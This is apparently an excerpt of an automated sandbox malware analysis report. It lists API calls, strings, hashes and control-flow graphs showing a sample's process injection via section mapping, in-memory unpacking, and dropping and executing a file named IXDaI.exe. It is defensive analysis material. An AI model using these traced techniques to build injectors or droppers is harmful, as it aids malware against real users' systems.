                                                                                      • Opcode Fuzzy Hash: 38f89845555c739da2b24524c93e5aab05116549c75dcbc269bd6cb267439962
                                                                                      • Instruction Fuzzy Hash: EB11BF36508200EFCB319F18EC4A96A7BE9FBC7B207204066F85987120DBB18E85CB50
                                                                                      APIs
                                                                                      Strings
                                                                                      • vHtzzRrcVJDOYsLdyrSqoKaOhCSkgmFRWpiXIxyqMnggEfXaUUFABiCAICwWENtJkjlATYudZGcxSHDqIXpjlKbPZtnQOmsUvYNoiGQbKyPBrLlzEHhBoTuMcfhaNjePVfLFsZWwJnmpVdRkDbwMxvTGeQeu, xrefs: 00BA1B8A, 00BA1B9C, 00BA1C15, 00BA1C49
                                                                                      • .exe, xrefs: 00BA1C57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcatmemcpymemsetrandsrand
                                                                                      • String ID: .exe$vHtzzRrcVJDOYsLdyrSqoKaOhCSkgmFRWpiXIxyqMnggEfXaUUFABiCAICwWENtJkjlATYudZGcxSHDqIXpjlKbPZtnQOmsUvYNoiGQbKyPBrLlzEHhBoTuMcfhaNjePVfLFsZWwJnmpVdRkDbwMxvTGeQeu
                                                                                      • API String ID: 122620767-2897188146
                                                                                      • Opcode ID: 08f1a6ff49ffe35edb1fd63bb192779cc55911c40957097779dc0ab460df4c54
                                                                                      • Instruction ID: d6497455f07d102a922026aa787c88b6661101e0def96a2e06dae5b52ad8a1d3
                                                                                      • Opcode Fuzzy Hash: 08f1a6ff49ffe35edb1fd63bb192779cc55911c40957097779dc0ab460df4c54
                                                                                      • Instruction Fuzzy Hash: A0213B32E4C2906ED265133D6C42BA97FC4CFE7B21F1644F9F9C52B1A2E6A40D898264
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00BA18B1
                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00BA18D3
                                                                                      • CloseHandle.KERNEL32(00BA2549), ref: 00BA18E9
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA18F0
                                                                                      • GetExitCodeProcess.KERNEL32(?,00BA2549), ref: 00BA1901
                                                                                      • CloseHandle.KERNEL32(?), ref: 00BA190A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                      • String ID:
                                                                                      • API String ID: 876959470-0
                                                                                      • Opcode ID: 5340d9219e92517a10df81b7133fdc8ae94ee07acfd2e64961046259db8f0860
                                                                                      • Instruction ID: 59b474cd3ce32fe7e508990b95f000b331d43a7fb575ea8c81f90e33fa6eaefa
                                                                                      • Opcode Fuzzy Hash: 5340d9219e92517a10df81b7133fdc8ae94ee07acfd2e64961046259db8f0860
                                                                                      • Instruction Fuzzy Hash: B6017172901128BBCB216B95DC49EDF7FBDEF86770F104021F915A61A0D6354A18CAA0
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00BA1334
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00BA133B
                                                                                      • memset.MSVCRT ref: 00BA1359
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcmemset
                                                                                      • String ID: NtSystemDebugControl$ntdll.dll
                                                                                      • API String ID: 3137504439-2438149413
                                                                                      • Opcode ID: 0d16c59259072f396176af302501a672d28813ab18c068670237ea1d310acb5f
                                                                                      • Instruction ID: ef6c76f412e5d867c45fbd3cda7b4d301482999db699af4d0f98118116a448cc
                                                                                      • Opcode Fuzzy Hash: 0d16c59259072f396176af302501a672d28813ab18c068670237ea1d310acb5f
                                                                                      • Instruction Fuzzy Hash: DE018071604309BFDF10DF98EC86A6FBBE8FB42714F0045AAF941A2150E7B08655CB55
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3636361484-0
                                                                                      • Opcode ID: 0f686fea38795462bc249f992cf8f516ceec48a15fbd092ac55fa442ad67d022
                                                                                      • Instruction ID: bfc016e87071d351fb399630f8f0f44ba4b2bc1d78f5a1cbedd43adc8599501f
                                                                                      • Opcode Fuzzy Hash: 0f686fea38795462bc249f992cf8f516ceec48a15fbd092ac55fa442ad67d022
                                                                                      • Instruction Fuzzy Hash: 9801F9B39082196FEB205764EC49FD777DCDB07350F0404A6EA45E3090EFB49E848BA0
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BA603C
                                                                                      • GetProcAddress.KERNEL32(00000000,00BA6064), ref: 00BA604F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 1646373207-1793498882
                                                                                      • Opcode ID: 487a8e016df83d3c1187aa195c34e30967c3483ad5919184e6f3424a306f6312
                                                                                      • Instruction ID: d19c272769a308f50cec8b47bfc98727ddd6e5afe4befe6235fee2d9cc782acf
                                                                                      • Opcode Fuzzy Hash: 487a8e016df83d3c1187aa195c34e30967c3483ad5919184e6f3424a306f6312
                                                                                      • Instruction Fuzzy Hash: 02F0F6F11482899FDF70CE68CC84BDE3BE4EB06700F50446AE909CB281DB3886458B14

                                                                                      Execution Graph

                                                                                      Execution Coverage:9.7%
                                                                                      Dynamic/Decrypted Code Coverage:28.1%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:171
                                                                                      Total number of Limit Nodes:10
                                                                                      execution_graph 3730 50f611 3731 50f620 3730->3731 3734 50fdb1 3731->3734 3735 50fdcc 3734->3735 3736 50fdd5 CreateToolhelp32Snapshot 3735->3736 3737 50fdf1 Module32First 3735->3737 3736->3735 3736->3737 3738 50fe00 3737->3738 3739 50f629 3737->3739 3741 50fa70 3738->3741 3742 50fa9b 3741->3742 3743 50fae4 3742->3743 3744 50faac VirtualAlloc 3742->3744 3743->3743 3744->3743 3861 670005 3866 67092b GetPEB 3861->3866 3863 670030 3868 67003c 3863->3868 3867 670972 3866->3867 3867->3863 3869 670049 3868->3869 3870 670e0f 2 API calls 3869->3870 3871 670223 3870->3871 3872 670d90 GetPEB 3871->3872 3873 670238 VirtualAlloc 3872->3873 3874 670265 3873->3874 3875 6702ce VirtualProtect 3874->3875 3877 67030b 3875->3877 3876 670439 VirtualFree 3880 6704be LoadLibraryA 3876->3880 3877->3876 3879 6708c7 3880->3879 3857 402e63 3858 402e67 3857->3858 3859 401918 8 API calls 3858->3859 3860 402f44 3858->3860 3859->3860 3925 401543 3928 401546 3925->3928 3926 4015e6 NtDuplicateObject 3927 401603 NtCreateSection 3926->3927 3933 401702 3926->3933 3929 401683 NtCreateSection 3927->3929 3930 401629 NtMapViewOfSection 3927->3930 3928->3926 3928->3933 3931 4016af 3929->3931 3929->3933 3930->3929 3932 40164c NtMapViewOfSection 3930->3932 3931->3933 3934 4016b9 NtMapViewOfSection 3931->3934 3932->3929 3935 40166a 3932->3935 3934->3933 3936 4016e0 NtMapViewOfSection 3934->3936 3935->3929 3936->3933 3985 401924 3986 401929 3985->3986 3987 40195e Sleep 3986->3987 3988 401979 3987->3988 3989 401538 7 API calls 3988->3989 3990 40198a 3988->3990 3989->3990 3881 670001 3882 670005 3881->3882 3883 67092b GetPEB 3882->3883 3884 670030 3883->3884 3885 67003c 7 API calls 3884->3885 3886 670038 3885->3886 3767 418048 3773 417d6f 3767->3773 3769 418050 3772 417d6f 33 API calls 3769->3772 3798 417af5 GlobalAlloc 3769->3798 3799 417af3 3769->3799 3772->3769 3774 417d7c 3773->3774 3775 417dfa 9 API calls 3774->3775 3779 417e8c 3774->3779 3780 417e74 3775->3780 3776 417e9b GlobalAlloc AddAtomA 3777 417eaa GetCommProperties SetLastError 3776->3777 3778 417ec7 GetProcessDefaultLayout 3777->3778 3777->3779 3778->3779 3779->3776 3779->3777 3781 417ee1 GetConsoleAliasesA 3779->3781 3782 417eda ReleaseActCtx 3779->3782 3783 417f01 FoldStringW 3779->3783 3784 417f19 3779->3784 3780->3779 3781->3779 3782->3781 3783->3779 3787 417f67 GetConsoleAliasesLengthW 3784->3787 3788 417f49 SetConsoleTitleA LocalFree 3784->3788 3792 417f74 3784->3792 3786 417f99 LoadLibraryA 3802 417b32 3786->3802 3787->3792 3791 417f5d 3788->3791 3791->3787 3801 417af5 GlobalAlloc 3792->3801 3795 417ff8 3807 417d30 3795->3807 3797 417ffd 3797->3769 3798->3769 3800 417af8 GlobalAlloc 3799->3800 3800->3769 3801->3786 3803 417b71 3802->3803 3804 417b7d GetModuleHandleW GetProcAddress 3803->3804 3805 417c53 3803->3805 3804->3803 3806 417b14 VirtualProtect 3805->3806 3806->3795 3814 417c78 3807->3814 3809 417d49 3810 417d53 UnhandledExceptionFilter FindFirstVolumeW 3809->3810 3811 417d65 3809->3811 3810->3811 3819 417ccf 3811->3819 3815 417c95 3814->3815 3816 417c8d CreateJobObjectW 3814->3816 3817 417cc4 3815->3817 3818 417ca9 OpenJobObjectW BuildCommDCBW LoadLibraryA 3815->3818 3816->3815 3817->3809 3818->3817 3820 417cdf WritePrivateProfileStringW 3819->3820 3822 417ce9 3819->3822 3820->3822 3821 417d16 3821->3797 3822->3821 3823 417d09 SleepEx 3822->3823 3823->3822 3824 402fe9 3825 403140 3824->3825 3826 403013 3824->3826 3826->3825 3827 4030ce RtlCreateUserThread NtTerminateProcess 3826->3827 3827->3825 3847 4c5000 3849 4c5044 GetPEB 3847->3849 3853 4c5077 CreateFileA 3849->3853 3851 4c522d 3854 4c5246 WriteFile 3851->3854 3855 4c5244 3851->3855 3852 4c5265 3853->3851 3853->3852 3856 4c5255 FindCloseChangeNotification WinExec 3854->3856 3855->3856 3856->3852 3903 401496 3904 401447 3903->3904 3904->3903 3905 4015e6 NtDuplicateObject 3904->3905 3911 40152f 3904->3911 3906 401603 NtCreateSection 3905->3906 3905->3911 3907 401683 NtCreateSection 3906->3907 3908 401629 NtMapViewOfSection 3906->3908 3909 4016af 3907->3909 3907->3911 3908->3907 3910 40164c NtMapViewOfSection 3908->3910 3909->3911 3912 4016b9 NtMapViewOfSection 3909->3912 3910->3907 3913 40166a 3910->3913 3912->3911 3914 4016e0 NtMapViewOfSection 3912->3914 3913->3907 3914->3911 3745 402eb7 3746 402eb8 3745->3746 3748 402f44 3746->3748 3749 401918 3746->3749 3750 401929 3749->3750 3751 40195e Sleep 3750->3751 3752 401979 3751->3752 3754 40198a 3752->3754 3755 401538 3752->3755 3754->3748 3756 401539 3755->3756 3757 4015e6 NtDuplicateObject 3756->3757 3763 401702 3756->3763 3758 401603 NtCreateSection 3757->3758 3757->3763 3759 401683 NtCreateSection 3758->3759 3760 401629 NtMapViewOfSection 3758->3760 3761 4016af 3759->3761 3759->3763 3760->3759 3762 40164c NtMapViewOfSection 3760->3762 3761->3763 3764 4016b9 NtMapViewOfSection 3761->3764 3762->3759 3765 40166a 3762->3765 3763->3754 3764->3763 3766 4016e0 NtMapViewOfSection 3764->3766 3765->3759 3766->3763 3828 67003c 3829 670049 3828->3829 3841 670e0f SetErrorMode SetErrorMode 3829->3841 3834 670265 3835 6702ce VirtualProtect 3834->3835 3837 67030b 3835->3837 3836 670439 VirtualFree 3840 6704be LoadLibraryA 3836->3840 3837->3836 3839 6708c7 3840->3839 3842 670223 3841->3842 3843 670d90 3842->3843 3844 670dad 3843->3844 3845 670dbb GetPEB 3844->3845 3846 670238 VirtualAlloc 3844->3846 3845->3846 3846->3834 3887 4014de 3888 401447 3887->3888 3889 40152f 3888->3889 3890 4015e6 NtDuplicateObject 3888->3890 3890->3889 3891 401603 NtCreateSection 3890->3891 3892 401683 NtCreateSection 3891->3892 3893 401629 NtMapViewOfSection 3891->3893 3892->3889 3894 4016af 3892->3894 3893->3892 3895 40164c NtMapViewOfSection 3893->3895 3894->3889 3896 4016b9 NtMapViewOfSection 3894->3896 3895->3892 3897 40166a 3895->3897 3896->3889 3898 4016e0 NtMapViewOfSection 3896->3898 3897->3892 3898->3889

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 64 4c5044-4c5074 GetPEB 65 4c5077-4c509a 64->65 66 4c509d-4c50a0 65->66 67 4c51ee-4c522b CreateFileA 66->67 68 4c50a6-4c50bc 66->68 92 4c522d-4c5230 67->92 93 4c5265-4c5269 67->93 69 4c50be-4c50c5 68->69 70 4c5110-4c5116 68->70 69->70 71 4c50c7-4c50ce 69->71 73 4c5118-4c511f 70->73 74 4c5129-4c512f 70->74 71->70 77 4c50d0-4c50d7 71->77 73->74 78 4c5121-4c5124 73->78 75 4c5148-4c514e 74->75 76 4c5131-4c5138 74->76 80 4c5167-4c516f 75->80 81 4c5150-4c5157 75->81 76->75 79 4c513a-4c5141 76->79 77->70 82 4c50d9-4c50dd 77->82 84 4c51bb-4c51c0 78->84 79->75 85 4c5143-4c5146 79->85 89 4c5188-4c518e 80->89 90 4c5171-4c5178 80->90 81->80 88 4c5159-4c5160 81->88 82->70 91 4c50df-4c50e3 82->91 86 4c51e0-4c51e9 84->86 87 4c51c2-4c51c5 84->87 85->84 86->66 87->86 95 4c51c7-4c51ca 87->95 88->80 96 4c5162-4c5165 88->96 99 4c51a7-4c51ad 89->99 100 4c5190-4c5197 89->100 90->89 97 4c517a-4c5181 90->97 91->84 98 4c50e9-4c510b 91->98 94 4c5232-4c5238 92->94 102 4c523a-4c5242 94->102 103 4c5246-4c5252 WriteFile 94->103 95->86 104 4c51cc-4c51cf 95->104 96->84 97->89 105 4c5183-4c5186 97->105 98->65 99->84 101 4c51af-4c51b6 99->101 100->99 106 4c5199-4c51a0 100->106 101->84 107 4c51b8 101->107 102->94 108 4c5244 102->108 109 4c5255-4c5262 FindCloseChangeNotification WinExec 103->109 104->86 110 4c51d1-4c51d4 104->110 105->84 106->99 112 4c51a2-4c51a5 106->112 107->84 108->109 109->93 110->86 113 4c51d6-4c51d9 110->113 112->84 113->86 114 4c51db-4c51de 113->114 114->67 114->86
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004C5223
                                                                                      • WriteFile.KERNELBASE(00000000,FFF3C42A,00003E00,?,00000000), ref: 004C5252
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004C5256
                                                                                      • WinExec.KERNEL32(?,00000005), ref: 004C5262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1780099665.00000000004C5000.00000040.00000001.01000000.00000009.sdmp, Offset: 004C5000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_4c5000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                      • String ID: .dll$Clos$Crea$GetM$GetT$IXDaI.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                                                      • API String ID: 2234911746-2954602755
                                                                                      • Opcode ID: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
                                                                                      • Instruction ID: 076991852e8da1fcb0d4b364c6bdcc5c790ac0df1960d3426473c1dba4c35b1e
                                                                                      • Opcode Fuzzy Hash: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
                                                                                      • Instruction Fuzzy Hash: DA61F878D016159BCF648F94C888FAEB7B4BB44315F5982AFD405A6301CB78AAC1CB99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 200 401496-4014a5 201 4014a7 200->201 202 40151b-40152d 200->202 203 4014a9-4014b5 201->203 204 4014cf 201->204 211 4014ba 202->211 212 40152f-401535 202->212 206 401471-401472 203->206 207 4014b7-4014b8 203->207 209 4014d6 204->209 213 401473-401484 206->213 210 401449 207->210 207->211 209->209 214 4014d8 209->214 215 40147b-40148e call 4011b7 210->215 216 40144b 210->216 217 401447-401456 211->217 218 4014bc-4014c3 211->218 213->215 214->202 215->200 220 40144c-401470 216->220 217->220 221 4014c5-4014c8 218->221 222 401539-401567 218->222 220->213 221->204 234 401558-401563 222->234 235 40156a-401590 call 4011b7 222->235 234->235 242 401592 235->242 243 401595-40159a 235->243 242->243 245 4015a0-4015b1 243->245 246 4018b8-4018c0 243->246 250 4018b6-4018c5 245->250 251 4015b7-4015e0 245->251 246->243 253 4018da 250->253 254 4018cb-4018d6 250->254 251->250 260 4015e6-4015fd NtDuplicateObject 251->260 253->254 256 4018dd-401915 call 4011b7 253->256 254->256 260->250 261 401603-401627 NtCreateSection 260->261 264 401683-4016a9 NtCreateSection 261->264 265 401629-40164a NtMapViewOfSection 261->265 264->250 266 4016af-4016b3 264->266 265->264 268 40164c-401668 NtMapViewOfSection 265->268 266->250 270 4016b9-4016da NtMapViewOfSection 266->270 268->264 271 40166a-401680 268->271 270->250 273 4016e0-4016fc NtMapViewOfSection 270->273 271->264 273->250 276 401702 call 401707 273->276
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                      • String ID:
                                                                                      • API String ID: 1652636561-0
                                                                                      • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                                                      • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                                                      • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                                                      • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 278 401538-401567 284 401558-401563 278->284 285 40156a-401590 call 4011b7 278->285 284->285 292 401592 285->292 293 401595-40159a 285->293 292->293 295 4015a0-4015b1 293->295 296 4018b8-4018c0 293->296 300 4018b6-4018c5 295->300 301 4015b7-4015e0 295->301 296->293 303 4018da 300->303 304 4018cb-4018d6 300->304 301->300 310 4015e6-4015fd NtDuplicateObject 301->310 303->304 306 4018dd-401915 call 4011b7 303->306 304->306 310->300 311 401603-401627 NtCreateSection 310->311 314 401683-4016a9 NtCreateSection 311->314 315 401629-40164a NtMapViewOfSection 311->315 314->300 316 4016af-4016b3 314->316 315->314 318 40164c-401668 NtMapViewOfSection 315->318 316->300 320 4016b9-4016da NtMapViewOfSection 316->320 318->314 321 40166a-401680 318->321 320->300 323 4016e0-4016fc NtMapViewOfSection 320->323 321->314 323->300 326 401702 call 401707 323->326
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                                                      • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                                                      • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                                                      • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 328 4014de-4014ed 329 401563 328->329 330 4014ef 328->330 331 40156a-401590 call 4011b7 329->331 332 401551-401552 330->332 333 4014f1-401502 330->333 353 401592 331->353 354 401595-40159a 331->354 332->329 334 401504-401516 333->334 335 40151d-40152d 333->335 337 40151b-40151c 334->337 340 4014ba 335->340 341 40152f-401535 335->341 337->335 343 401447-401456 340->343 344 4014bc-4014c3 340->344 350 40144c-401470 343->350 346 4014c5-4014c8 344->346 347 401539-401567 344->347 351 4014cf 346->351 347->331 366 401558-401560 347->366 367 401473-401484 350->367 356 4014d6 351->356 353->354 362 4015a0-4015b1 354->362 363 4018b8-4018c0 354->363 356->356 360 4014d8 356->360 360->337 373 4018b6-4018c5 362->373 374 4015b7-4015e0 362->374 363->354 366->329 372 40147b-4014a5 call 4011b7 367->372 372->337 386 4014a7 372->386 378 4018da 373->378 379 4018cb-4018d6 373->379 374->373 389 4015e6-4015fd NtDuplicateObject 374->389 378->379 382 4018dd-401915 call 4011b7 378->382 379->382 386->351 388 4014a9-4014b5 386->388 390 401471-401472 388->390 391 4014b7-4014b8 388->391 389->373 392 401603-401627 NtCreateSection 389->392 390->367 391->340 395 401449 391->395 396 401683-4016a9 NtCreateSection 392->396 397 401629-40164a NtMapViewOfSection 392->397 395->372 398 40144b 395->398 396->373 399 4016af-4016b3 396->399 397->396 401 40164c-401668 NtMapViewOfSection 397->401 398->350 399->373 403 4016b9-4016da NtMapViewOfSection 399->403 401->396 404 40166a-401680 401->404 403->373 406 4016e0-4016fc NtMapViewOfSection 403->406 404->396 406->373 409 401702 call 401707 406->409
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                      • String ID:
                                                                                      • API String ID: 1652636561-0
                                                                                      • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                                                      • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                                                      • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                                                      • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 411 401543-401544 412 401546-401567 411->412 413 4015af-4015b1 411->413 419 401558-401563 412->419 420 40156a-401590 call 4011b7 412->420 414 4018b6-4018c5 413->414 415 4015b7-4015e0 413->415 421 4018da 414->421 422 4018cb-4018d6 414->422 415->414 432 4015e6-4015fd NtDuplicateObject 415->432 419->420 442 401592 420->442 443 401595-40159a 420->443 421->422 425 4018dd-401915 call 4011b7 421->425 422->425 432->414 434 401603-401627 NtCreateSection 432->434 438 401683-4016a9 NtCreateSection 434->438 439 401629-40164a NtMapViewOfSection 434->439 438->414 440 4016af-4016b3 438->440 439->438 444 40164c-401668 NtMapViewOfSection 439->444 440->414 446 4016b9-4016da NtMapViewOfSection 440->446 442->443 452 4015a0-4015ad 443->452 453 4018b8-4018c0 443->453 444->438 447 40166a-401680 444->447 446->414 450 4016e0-4016fc NtMapViewOfSection 446->450 447->438 450->414 455 401702 call 401707 450->455 452->413 453->443
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
